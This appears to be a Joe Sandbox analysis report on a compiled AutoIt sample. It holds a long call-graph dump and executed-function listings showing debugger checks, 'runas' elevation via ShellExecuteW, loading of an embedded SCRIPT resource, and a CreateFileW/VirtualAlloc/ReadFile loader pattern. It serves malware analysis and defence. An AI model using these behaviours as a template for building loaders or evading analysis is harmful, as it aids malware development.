59 API calls 98900->98902 98901 34766f 59 API calls 98901->98902 98902->98897 98902->98900 98902->98901 98905 3463a0 95 API calls 2 library calls 98902->98905 98906 3968a9 59 API calls Mailbox 98902->98906 98903->97777 98904->97779 98905->98902 98906->98902 98907->97793 98908->97794 98910 34e835 98909->98910 98911 383e02 98910->98911 98913 34e8f9 98910->98913 98916 34e89f 98910->98916 98981 34a000 98911->98981 98915 3477c7 59 API calls 98913->98915 98919 362ec0 __cinit 67 API calls 98913->98919 98921 383e7f 98913->98921 98926 34eaba 98913->98926 98937 34ead0 Mailbox 98913->98937 98914 383e17 98914->98937 99004 3a9ed4 90 API calls 4 library calls 98914->99004 98915->98913 98916->98913 98918 3477c7 59 API calls 98916->98918 98920 383e5d 98918->98920 98919->98913 98922 362ec0 __cinit 67 API calls 98920->98922 98921->97872 98922->98913 98923 348620 69 API calls 98923->98937 98924 34a000 342 API calls 98924->98937 98926->98937 99005 3a9ed4 90 API calls 4 library calls 98926->99005 98927 348ea0 59 API calls 98927->98937 98931 34f2f5 99009 3a9ed4 90 API calls 4 library calls 98931->99009 98932 38417e 98932->97872 98936 3a9ed4 90 API calls 98936->98937 98937->98923 98937->98924 98937->98927 98937->98931 98937->98936 98939 34ebd8 98937->98939 98980 3480d7 59 API calls 2 library calls 98937->98980 99006 3971e5 59 API calls 98937->99006 99007 3bc6d7 342 API calls 98937->99007 99008 3bb651 342 API calls Mailbox 98937->99008 99010 349df0 59 API calls Mailbox 98937->99010 99011 3b94db 342 API calls Mailbox 98937->99011 98939->97872 98941 34f7b0 98940->98941 98942 34f61a 98940->98942 98943 347f41 59 API calls 98941->98943 98944 34f626 98942->98944 98945 384777 98942->98945 98948 34f6ec Mailbox 98943->98948 99104 34f3f0 342 API calls 2 library calls 98944->99104 99106 3bbd80 342 API calls Mailbox 98945->99106 99018 3a3c7b 98948->99018 99021 3be037 98948->99021 99024 3acc06 98948->99024 98949 34f65d 98949->98948 98950 34f790 98949->98950 98951 384785 98949->98951 98950->97872 98951->98950 99107 3a9ed4 90 API calls 4 library calls 98951->99107 98954 34f743 98954->98950 99105 349df0 59 API calls Mailbox 98954->99105 98958->97872 98959->97872 98960->97872 98961->97802 98962->97807 98963->97872 98964->97809 98965->97809 98966->97809 98967->97872 98968->97872 98969->97872 98970->97872 98971->97872 98972->97872 98973->97856 98974->97856 98975->97856 98976->97856 98977->97856 98978->97856 98979->97856 98980->98937 98982 34a01f 98981->98982 98996 34a04d Mailbox 98981->98996 98983 360f36 Mailbox 59 API calls 98982->98983 98983->98996 98984 362ec0 67 API calls __cinit 98984->98996 98985 34b5d5 98986 3481a7 59 API calls 98985->98986 98999 34a1b7 98986->98999 98988 360f36 59 API calls Mailbox 98988->98996 98990 3803ae 99014 3a9ed4 90 API calls 4 library calls 98990->99014 98992 3481a7 59 API calls 98992->98996 98993 3477c7 59 API calls 98993->98996 98996->98984 98996->98985 98996->98988 98996->98990 98996->98992 98996->98993 98997 3971e5 59 API calls 98996->98997 98996->98999 99000 380d2f 98996->99000 99002 34a6ba 98996->99002 99003 34b5da 98996->99003 99012 34ca20 342 API calls 2 library calls 98996->99012 99013 34ba60 60 API calls Mailbox 98996->99013 98997->98996 98998 3803bd 98998->98914 98999->98914 99016 3a9ed4 90 API calls 4 library calls 99000->99016 99015 3a9ed4 90 API calls 4 library calls 99002->99015 99017 3a9ed4 90 API calls 4 library calls 99003->99017 99004->98937 99005->98937 99006->98937 99007->98937 99008->98937 99009->98932 99010->98937 99011->98937 99012->98996 99013->98996 99014->98998 99015->98999 99016->99003 99017->98999 99108 3a449b GetFileAttributesW 99018->99108 99112 3bcbf1 99021->99112 99023 3be047 99023->98954 99025 3477c7 59 API calls 99024->99025 99026 3acc3b 99025->99026 99027 3477c7 59 API calls 99026->99027 99028 3acc44 99027->99028 99029 3acc58 99028->99029 99311 349c9c 59 API calls 99028->99311 99031 349997 85 API calls 99029->99031 99032 3acc75 99031->99032 99033 3acd76 99032->99033 99034 3acc97 99032->99034 99039 3acda6 Mailbox 99032->99039 99036 344f3d 136 API calls 99033->99036 99035 349997 85 API calls 99034->99035 99037 3acca3 99035->99037 99038 3acd8a 99036->99038 99040 3481a7 59 API calls 99037->99040 99042 344f3d 136 API calls 99038->99042 99044 3acda2 99038->99044 99039->98954 99046 3accaf 99040->99046 99041 3477c7 59 API calls 99043 3acdd7 99041->99043 99042->99044 99045 3477c7 59 API calls 99043->99045 99044->99039 99044->99041 99047 3acde0 99045->99047 99048 3accc3 99046->99048 99049 3accf5 99046->99049 99051 3477c7 59 API calls 99047->99051 99052 3481a7 59 API calls 99048->99052 99050 349997 85 API calls 99049->99050 99053 3acd02 99050->99053 99054 3acde9 99051->99054 99055 3accd3 99052->99055 99056 3481a7 59 API calls 99053->99056 99057 3477c7 59 API calls 99054->99057 99058 347e0b 59 API calls 99055->99058 99059 3acd0e 99056->99059 99060 3acdf2 99057->99060 99061 3accdd 99058->99061 99312 3a4ad8 GetFileAttributesW 99059->99312 99064 349997 85 API calls 99060->99064 99062 349997 85 API calls 99061->99062 99065 3acce9 99062->99065 99067 3acdff 99064->99067 99068 347c8e 59 API calls 99065->99068 99066 3acd17 99069 3acd2a 99066->99069 99072 347b52 59 API calls 99066->99072 99070 3446f9 59 API calls 99067->99070 99068->99049 99071 349997 85 API calls 99069->99071 99079 3acd30 99069->99079 99073 3ace1a 99070->99073 99074 3acd57 99071->99074 99072->99069 99075 347b52 59 API calls 99073->99075 99313 3a3833 75 API calls Mailbox 99074->99313 99077 3ace29 99075->99077 99078 3ace5d 99077->99078 99080 347b52 59 API calls 99077->99080 99081 3481a7 59 API calls 99078->99081 99079->99039 99082 3ace3a 99080->99082 99083 3ace6b 99081->99083 99082->99078 99085 347d2c 59 API calls 99082->99085 99084 347c8e 59 API calls 99083->99084 99086 3ace79 99084->99086 99087 3ace4f 99085->99087 99088 347c8e 59 API calls 99086->99088 99089 347d2c 59 API calls 99087->99089 99090 3ace87 99088->99090 99089->99078 99091 347c8e 59 API calls 99090->99091 99092 3ace95 99091->99092 99093 349997 85 API calls 99092->99093 99094 3acea1 99093->99094 99202 3a40b2 99094->99202 99096 3aceb2 99097 3a3c7b 3 API calls 99096->99097 99098 3acebc 99097->99098 99099 349997 85 API calls 99098->99099 99103 3aceed 99098->99103 99100 3aceda 99099->99100 99256 3a91fe 99100->99256 99102 344faa 84 API calls 99102->99039 99103->99102 99104->98949 99105->98954 99106->98951 99107->98950 99109 3a3c82 99108->99109 99110 3a44b6 FindFirstFileW 99108->99110 99109->98954 99110->99109 99111 3a44cb FindClose 99110->99111 99111->99109 99113 349997 85 API calls 99112->99113 99114 3bcc2e 99113->99114 99139 3bcc75 Mailbox 99114->99139 99150 3bd8b9 99114->99150 99116 3bcecd 99117 3bd042 99116->99117 99121 3bcedb 99116->99121 99189 3bd9dc 93 API calls Mailbox 99117->99189 99120 3bd051 99120->99121 99122 3bd05d 99120->99122 99163 3bca82 99121->99163 99122->99139 99123 349997 85 API calls 99137 3bccc6 Mailbox 99123->99137 99128 3bcf14 99178 360d88 99128->99178 99131 3bcf2e 99184 3a9ed4 90 API calls 4 library calls 99131->99184 99132 3bcf47 99134 34942e 59 API calls 99132->99134 99136 3bcf53 99134->99136 99135 3bcf39 GetCurrentProcess TerminateProcess 99135->99132 99138 3491b0 59 API calls 99136->99138 99137->99116 99137->99123 99137->99139 99182 3af656 59 API calls 2 library calls 99137->99182 99183 3bd0f3 61 API calls 2 library calls 99137->99183 99140 3bcf69 99138->99140 99139->99023 99149 3bcf90 99140->99149 99185 348ea0 59 API calls Mailbox 99140->99185 99142 3bcf7f 99186 3bd75d 108 API calls _free 99142->99186 99143 3bd0b8 99143->99139 99144 3bd0cc FreeLibrary 99143->99144 99144->99139 99149->99143 99187 348ea0 59 API calls Mailbox 99149->99187 99188 349e9c 60 API calls Mailbox 99149->99188 99190 3bd75d 108 API calls _free 99149->99190 99151 347faf 59 API calls 99150->99151 99152 3bd8d4 CharLowerBuffW 99151->99152 99191 39f479 99152->99191 99156 3477c7 59 API calls 99157 3bd90d 99156->99157 99158 3479ab 59 API calls 99157->99158 99159 3bd924 99158->99159 99160 347e8c 59 API calls 99159->99160 99161 3bd930 Mailbox 99160->99161 99162 3bd96c Mailbox 99161->99162 99198 3bd0f3 61 API calls 2 library calls 99161->99198 99162->99137 99164 3bca9d 99163->99164 99165 3bcaf2 99163->99165 99166 360f36 Mailbox 59 API calls 99164->99166 99169 3bdb64 99165->99169 99168 3bcabf 99166->99168 99167 360f36 Mailbox 59 API calls 99167->99168 99168->99165 99168->99167 99170 3bdd8d Mailbox 99169->99170 99177 3bdb87 _strcat _wcscpy __wsetenvp 99169->99177 99170->99128 99171 349cf8 59 API calls 99171->99177 99172 349d46 59 API calls 99172->99177 99173 349c9c 59 API calls 99173->99177 99174 36588c 58 API calls _W_store_winword 99174->99177 99175 349997 85 API calls 99175->99177 99177->99170 99177->99171 99177->99172 99177->99173 99177->99174 99177->99175 99201 3a592e 61 API calls 2 library calls 99177->99201 99180 360d9d 99178->99180 99179 360e35 VirtualAlloc 99181 360e03 99179->99181 99180->99179 99180->99181 99181->99131 99181->99132 99182->99137 99183->99137 99184->99135 99185->99142 99186->99149 99187->99149 99188->99149 99189->99120 99190->99149 99192 39f4a4 __wsetenvp 99191->99192 99193 39f58a 99192->99193 99194 39f4d9 99192->99194 99197 39f4e3 99192->99197 99193->99197 99200 347a24 61 API calls 99193->99200 99194->99197 99199 347a24 61 API calls 99194->99199 99197->99156 99197->99161 99198->99162 99199->99194 99200->99193 99201->99177 99203 3a40ce 99202->99203 99204 3a40d3 99203->99204 99205 3a40e1 99203->99205 99207 3481a7 59 API calls 99204->99207 99206 3477c7 59 API calls 99205->99206 99208 3a40e9 99206->99208 99255 3a40dc Mailbox 99207->99255 99209 3477c7 59 API calls 99208->99209 99210 3a40f1 99209->99210 99211 3477c7 59 API calls 99210->99211 99212 3a40fc 99211->99212 99213 3477c7 59 API calls 99212->99213 99214 3a4104 99213->99214 99215 3477c7 59 API calls 99214->99215 99216 3a410c 99215->99216 99217 3477c7 59 API calls 99216->99217 99218 3a4114 99217->99218 99219 3477c7 59 API calls 99218->99219 99220 3a411c 99219->99220 99221 3477c7 59 API calls 99220->99221 99222 3a4124 99221->99222 99223 3446f9 59 API calls 99222->99223 99224 3a413b 99223->99224 99225 3446f9 59 API calls 99224->99225 99226 3a4154 99225->99226 99227 347b52 59 API calls 99226->99227 99228 3a4160 99227->99228 99229 3a4173 99228->99229 99230 347e8c 59 API calls 99228->99230 99231 347b52 59 API calls 99229->99231 99230->99229 99232 3a417c 99231->99232 99233 3a418c 99232->99233 99234 347e8c 59 API calls 99232->99234 99235 3481a7 59 API calls 99233->99235 99234->99233 99236 3a4198 99235->99236 99237 347c8e 59 API calls 99236->99237 99238 3a41a4 99237->99238 99314 3a4264 59 API calls 99238->99314 99240 3a41b3 99315 3a4264 59 API calls 99240->99315 99242 3a41c6 99243 347b52 59 API calls 99242->99243 99244 3a41d0 99243->99244 99245 3a41e7 99244->99245 99246 3a41d5 99244->99246 99248 347b52 59 API calls 99245->99248 99247 347e0b 59 API calls 99246->99247 99249 3a41e2 99247->99249 99250 3a41f0 99248->99250 99252 347c8e 59 API calls 99249->99252 99251 3a420e 99250->99251 99254 347e0b 59 API calls 99250->99254 99253 347c8e 59 API calls 99251->99253 99252->99251 99253->99255 99254->99249 99255->99096 99257 3a920b __write_nolock 99256->99257 99258 360f36 Mailbox 59 API calls 99257->99258 99259 3a9268 99258->99259 99260 34538e 59 API calls 99259->99260 99261 3a9272 99260->99261 99262 3a9008 GetSystemTimeAsFileTime 99261->99262 99263 3a927d 99262->99263 99264 345045 85 API calls 99263->99264 99265 3a9290 _wcscmp 99264->99265 99266 3a9361 99265->99266 99267 3a92b4 99265->99267 99268 3a97dd 96 API calls 99266->99268 99269 3a97dd 96 API calls 99267->99269 99284 3a932d _wcscat 99268->99284 99270 3a92b9 99269->99270 99274 3a936a 99270->99274 99333 36426e 58 API calls __wsplitpath_helper 99270->99333 99272 34506b 74 API calls 99273 3a9386 99272->99273 99275 34506b 74 API calls 99273->99275 99274->99103 99277 3a9396 99275->99277 99276 3a92e2 _wcscat _wcscpy 99334 36426e 58 API calls __wsplitpath_helper 99276->99334 99278 34506b 74 API calls 99277->99278 99280 3a93b1 99278->99280 99281 34506b 74 API calls 99280->99281 99282 3a93c1 99281->99282 99283 34506b 74 API calls 99282->99283 99285 3a93dc 99283->99285 99284->99272 99284->99274 99286 34506b 74 API calls 99285->99286 99287 3a93ec 99286->99287 99288 34506b 74 API calls 99287->99288 99289 3a93fc 99288->99289 99290 34506b 74 API calls 99289->99290 99291 3a940c 99290->99291 99316 3a998c GetTempPathW GetTempFileNameW 99291->99316 99293 3a9418 99294 3653cb 115 API calls 99293->99294 99296 3a9429 99294->99296 99295 365516 __fcloseall 83 API calls 99297 3a94ee 99295->99297 99296->99274 99298 34506b 74 API calls 99296->99298 99309 3a94e3 99296->99309 99317 3649d3 99296->99317 99299 3a9508 99297->99299 99300 3a94f4 DeleteFileW 99297->99300 99298->99296 99301 3a95ae CopyFileW 99299->99301 99304 3a9512 _wcsncpy 99299->99304 99300->99274 99302 3a95d6 DeleteFileW 99301->99302 99303 3a95c4 DeleteFileW 99301->99303 99330 3a994b CreateFileW 99302->99330 99303->99274 99335 3a8baf 116 API calls __fcloseall 99304->99335 99308 3a9599 99308->99302 99310 3a959d DeleteFileW 99308->99310 99309->99295 99310->99274 99311->99029 99312->99066 99313->99079 99314->99240 99315->99242 99316->99293 99318 3649df __getstream 99317->99318 99319 364a15 99318->99319 99320 3649fd 99318->99320 99321 364a0d __getstream 99318->99321 99322 366d8e __lock_file 59 API calls 99319->99322 99348 368ca8 58 API calls __getptd_noexit 99320->99348 99321->99296 99325 364a1b 99322->99325 99324 364a02 99349 368f36 9 API calls __filbuf 99324->99349 99336 36487a 99325->99336 99331 3a9971 SetFileTime CloseHandle 99330->99331 99332 3a9987 99330->99332 99331->99332 99332->99274 99333->99276 99334->99284 99335->99308 99339 364889 99336->99339 99342 3648a7 99336->99342 99337 364897 99351 368ca8 58 API calls __getptd_noexit 99337->99351 99339->99337 99339->99342 99346 3648c1 _memmove 99339->99346 99340 36489c 99352 368f36 9 API calls __filbuf 99340->99352 99350 364a4d LeaveCriticalSection LeaveCriticalSection _fprintf 99342->99350 99344 364bad __flush 78 API calls 99344->99346 99345 364856 __filbuf 58 API calls 99345->99346 99346->99342 99346->99344 99346->99345 99347 36da06 __write 78 API calls 99346->99347 99353 36af9e 78 API calls 5 library calls 99346->99353 99347->99346 99348->99324 99349->99321 99350->99321 99351->99340 99352->99342 99353->99346 99355 347dbf __wsetenvp 99354->99355 99357 347dd0 _memmove 99355->99357 99360 348189 59 API calls Mailbox 99355->99360 99357->97889 99358 37f060 _memmove 99359->97890 99360->99358 99361 343633 99362 34366a 99361->99362 99363 3436e7 99362->99363 99364 343688 99362->99364 99405 3436e5 99362->99405 99368 3436ed 99363->99368 99369 37d24c 99363->99369 99365 343695 99364->99365 99366 34375d PostQuitMessage 99364->99366 99370 3436a0 99365->99370 99371 37d2bf 99365->99371 99373 3436d8 99366->99373 99367 3436ca DefWindowProcW 99367->99373 99374 343715 SetTimer RegisterWindowMessageW 99368->99374 99375 3436f2 99368->99375 99411 3511d0 10 API calls Mailbox 99369->99411 99376 343767 99370->99376 99377 3436a8 99370->99377 99416 3a281f 71 API calls _memset 99371->99416 99374->99373 99378 34373e CreatePopupMenu I_RpcFreeBuffer 99374->99378 99381 37d1ef 99375->99381 99382 3436f9 KillTimer 99375->99382 99409 344531 64 API calls _memset 99376->99409 99384 37d2a4 99377->99384 99385 3436b3 99377->99385 99386 34374b 99378->99386 99380 37d273 99412 3511f3 342 API calls Mailbox 99380->99412 99390 37d1f4 99381->99390 99391 37d228 MoveWindow 99381->99391 99406 3444cb Shell_NotifyIconW _memset 99382->99406 99384->99367 99415 397f5e 59 API calls Mailbox 99384->99415 99385->99386 99393 3436be 99385->99393 99408 3445df 81 API calls _memset 99386->99408 99387 37d2d1 99387->99367 99387->99373 99396 37d217 SetFocus 99390->99396 99397 37d1f8 99390->99397 99391->99373 99392 34370c 99407 343114 DeleteObject DestroyWindow Mailbox 99392->99407 99393->99367 99413 3444cb Shell_NotifyIconW _memset 99393->99413 99395 34375b 99395->99373 99396->99373 99397->99393 99398 37d201 99397->99398 99410 3511d0 10 API calls Mailbox 99398->99410 99403 37d298 99414 3443db 68 API calls _memset 99403->99414 99405->99367 99406->99392 99407->99373 99408->99395 99409->99395 99410->99373 99411->99380 99412->99393 99413->99403 99414->99405 99415->99405 99416->99387 99417 34107d 99422 3471eb 99417->99422 99419 34108c 99420 362ec0 __cinit 67 API calls 99419->99420 99421 341096 99420->99421 99423 3471fb __write_nolock 99422->99423 99424 3477c7 59 API calls 99423->99424 99425 3472b1 99424->99425 99426 344864 61 API calls 99425->99426 99427 3472ba 99426->99427 99453 36068b 99427->99453 99430 347e0b 59 API calls 99431 3472d3 99430->99431 99432 343f84 59 API calls 99431->99432 99433 3472e2 99432->99433 99434 3477c7 59 API calls 99433->99434 99435 3472eb 99434->99435 99436 347eec 59 API calls 99435->99436 99437 3472f4 RegOpenKeyExW 99436->99437 99438 37ec0a RegQueryValueExW 99437->99438 99443 347316 Mailbox 99437->99443 99439 37ec27 99438->99439 99440 37ec9c RegCloseKey 99438->99440 99441 360f36 Mailbox 59 API calls 99439->99441 99440->99443 99451 37ecae _wcscat Mailbox __wsetenvp 99440->99451 99442 37ec40 99441->99442 99444 34538e 59 API calls 99442->99444 99443->99419 99445 37ec4b RegQueryValueExW 99444->99445 99446 37ec68 99445->99446 99448 37ec82 99445->99448 99447 347d2c 59 API calls 99446->99447 99447->99448 99448->99440 99449 347f41 59 API calls 99449->99451 99450 343f84 59 API calls 99450->99451 99451->99443 99451->99449 99451->99450 99452 347b52 59 API calls 99451->99452 99452->99451 99454 371ac0 __write_nolock 99453->99454 99455 360698 GetFullPathNameW 99454->99455 99456 3606ba 99455->99456 99457 347d2c 59 API calls 99456->99457 99458 3472c5 99457->99458 99458->99430 99459 3a8db6 99460 3a8dc9 99459->99460 99461 3a8dc3 99459->99461 99463 3a8dda 99460->99463 99464 362ed5 _free 58 API calls 99460->99464 99462 362ed5 _free 58 API calls 99461->99462 99462->99460 99465 362ed5 _free 58 API calls 99463->99465 99466 3a8dec 99463->99466 99464->99463 99465->99466 99467 380155 99473 34ade2 Mailbox 99467->99473 99469 380bb5 99482 3963f2 59 API calls Mailbox 99469->99482 99471 380bbe 99473->99469 99473->99471 99475 34b6c1 99473->99475 99477 3be037 131 API calls 99473->99477 99478 349df0 59 API calls Mailbox 99473->99478 99479 348e34 59 API calls Mailbox 99473->99479 99480 3971e5 59 API calls 99473->99480 99481 3a9ed4 90 API calls 4 library calls 99475->99481 99477->99473 99478->99473 99479->99473 99480->99473 99481->99469 99482->99471 99483 24e23b0 99497 24e0000 99483->99497 99485 24e247b 99500 24e22a0 99485->99500 99487 24e24a4 CreateFileW 99489 24e24f8 99487->99489 99490 24e24f3 99487->99490 99489->99490 99491 24e250f VirtualAlloc 99489->99491 99491->99490 99492 24e252d ReadFile 99491->99492 99492->99490 99493 24e2548 99492->99493 99494 24e12a0 13 API calls 99493->99494 99495 24e257b 99494->99495 99496 24e259e ExitProcess 99495->99496 99496->99490 99503 24e34a0 GetPEB 99497->99503 99499 24e068b 99499->99485 99501 24e22a9 Sleep 99500->99501 99502 24e22b7 99501->99502 99504 24e34ca 99503->99504 99504->99499

                                                          Executed Functions

                                                          Function 00343B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00343B7A
                                                          • IsDebuggerPresent.KERNEL32 ref: 00343B8C
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,004052F8,004052E0,?,?), ref: 00343BFD
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                            • Part of subcall function 00350A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00343C26,004052F8,?,?,?), ref: 00350ACE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00343C81
                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,003F7770,00000010), ref: 0037D3EC
                                                          • SetCurrentDirectoryW.KERNEL32(?,004052F8,?,?,?), ref: 0037D424
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,003F4260,004052F8,?,?,?), ref: 0037D4AA
                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 0037D4B1
                                                            • Part of subcall function 00343A58: GetSysColorBrush.USER32(0000000F), ref: 00343A62
                                                            • Part of subcall function 00343A58: LoadCursorW.USER32(00000000,00007F00), ref: 00343A71
                                                            • Part of subcall function 00343A58: LoadIconW.USER32(00000063), ref: 00343A88
                                                            • Part of subcall function 00343A58: LoadIconW.USER32(000000A4), ref: 00343A9A
                                                            • Part of subcall function 00343A58: LoadIconW.USER32(000000A2), ref: 00343AAC
                                                            • Part of subcall function 00343A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00343AD2
                                                            • Part of subcall function 00343A58: RegisterClassExW.USER32(?), ref: 00343B28
                                                            • Part of subcall function 003439E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00343A15
                                                            • Part of subcall function 003439E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343A36
                                                            • Part of subcall function 003439E7: ShowWindow.USER32(00000000,?,?), ref: 00343A4A
                                                            • Part of subcall function 003439E7: ShowWindow.USER32(00000000,?,?), ref: 00343A53
                                                            • Part of subcall function 003443DB: _memset.LIBCMT ref: 00344401
                                                            • Part of subcall function 003443DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003444A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: This is a third-party compiled AutoIt script.$runas$%=
                                                          • API String ID: 529118366-4029254884
                                                          • Opcode ID: 4a26b77e583a7036c229502b1b3f90ef99d7eec1fae3995ace65b0d004728fa8
                                                          • Instruction ID: a3bdb420a114daa79d2210ecf1a1656c82812b3899798bfc2b35a57748377afd
                                                          • Opcode Fuzzy Hash: 4a26b77e583a7036c229502b1b3f90ef99d7eec1fae3995ace65b0d004728fa8
                                                          • Instruction Fuzzy Hash: 8951BF75908249AECF13ABB4DC45EFE7BB9EF44300F0081B9E851BE1A1DB746A458F25
                                                          Function 00344FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 983 344fe9-345001 CreateStreamOnHGlobal 984 345021-345026 983->984 985 345003-34501a FindResourceExW 983->985 986 345020 985->986 987 37dc8c-37dc9b LoadResource 985->987 986->984 987->986 988 37dca1-37dcaf SizeofResource 987->988 988->986 989 37dcb5-37dcc0 LockResource 988->989 989->986 990 37dcc6-37dce4 989->990 990->986
                                                          APIs
                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00344EEE,?,?,00000000,00000000), ref: 00344FF9
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00344EEE,?,?,00000000,00000000), ref: 00345010
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00344EEE,?,?,00000000,00000000,?,?,?,?,?,?,00344F8F), ref: 0037DC90
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00344EEE,?,?,00000000,00000000,?,?,?,?,?,?,00344F8F), ref: 0037DCA5
                                                          • LockResource.KERNEL32(N4,?,?,00344EEE,?,?,00000000,00000000,?,?,?,?,?,?,00344F8F,00000000), ref: 0037DCB8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT$N4
                                                          • API String ID: 3051347437-3281411753
                                                          • Opcode ID: 3c641b62f84ada2fc8b45ee7cf852e23e8181637bda7aa74394edc94f27cd1c5
                                                          • Instruction ID: aee955afa10800fb91640499cac9e6a9401b6ea2f7b9016fcc1d680638973e90
                                                          • Opcode Fuzzy Hash: 3c641b62f84ada2fc8b45ee7cf852e23e8181637bda7aa74394edc94f27cd1c5
                                                          • Instruction Fuzzy Hash: 8F112E79640701AFD7228B65DC58F677BBEEBC9B51F10456CF405DA250DB61EC008660
                                                          Function 00344AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1047 344afe-344b5e call 3477c7 GetVersionExW call 347d2c 1052 344b64 1047->1052 1053 344c69-344c6b 1047->1053 1054 344b67-344b6c 1052->1054 1055 37dac0-37dacc 1053->1055 1057 344c70-344c71 1054->1057 1058 344b72 1054->1058 1056 37dacd-37dad1 1055->1056 1059 37dad4-37dae0 1056->1059 1060 37dad3 1056->1060 1061 344b73-344baa call 347e8c call 347886 1057->1061 1058->1061 1059->1056 1062 37dae2-37dae7 1059->1062 1060->1059 1070 344bb0-344bb1 1061->1070 1071 37dbbd-37dbc0 1061->1071 1062->1054 1064 37daed-37daf4 1062->1064 1064->1055 1066 37daf6 1064->1066 1069 37dafb-37dafe 1066->1069 1072 37db04-37db22 1069->1072 1073 344bf1-344c08 GetCurrentProcess IsWow64Process 1069->1073 1070->1069 1074 344bb7-344bc2 1070->1074 1075 37dbc2 1071->1075 1076 37dbd9-37dbdd 1071->1076 1072->1073 1077 37db28-37db2e 1072->1077 1083 344c0d-344c1e 1073->1083 1084 344c0a 1073->1084 1078 37db43-37db49 1074->1078 1079 344bc8-344bca 1074->1079 1080 37dbc5 1075->1080 1081 37dbdf-37dbe8 1076->1081 1082 37dbc8-37dbd1 1076->1082 1087 37db30-37db33 1077->1087 1088 37db38-37db3e 1077->1088 1091 37db53-37db59 1078->1091 1092 37db4b-37db4e 1078->1092 1089 344bd0-344bd3 1079->1089 1090 37db5e-37db6a 1079->1090 1080->1082 1081->1080 1093 37dbea-37dbed 1081->1093 1082->1076 1085 344c20-344c30 call 344c95 1083->1085 1086 344c89-344c93 GetSystemInfo 1083->1086 1084->1083 1104 344c32-344c3f call 344c95 1085->1104 1105 344c7d-344c87 GetSystemInfo 1085->1105 1094 344c56-344c66 1086->1094 1087->1073 1088->1073 1098 37db8a-37db8d 1089->1098 1099 344bd9-344be8 1089->1099 1095 37db74-37db7a 1090->1095 1096 37db6c-37db6f 1090->1096 1091->1073 1092->1073 1093->1082 1095->1073 1096->1073 1098->1073 1101 37db93-37dba8 1098->1101 1102 37db7f-37db85 1099->1102 1103 344bee 1099->1103 1106 37dbb2-37dbb8 1101->1106 1107 37dbaa-37dbad 1101->1107 1102->1073 1103->1073 1112 344c76-344c7b 1104->1112 1113 344c41-344c45 GetNativeSystemInfo 1104->1113 1109 344c47-344c4b 1105->1109 1106->1073 1107->1073 1109->1094 1111 344c4d-344c50 FreeLibrary 1109->1111 1111->1094 1112->1113 1113->1109
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00344B2B
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          • GetCurrentProcess.KERNEL32(?,003CFAEC,00000000,00000000,?), ref: 00344BF8
                                                          • IsWow64Process.KERNEL32(00000000), ref: 00344BFF
                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00344C45
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00344C50
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00344C81
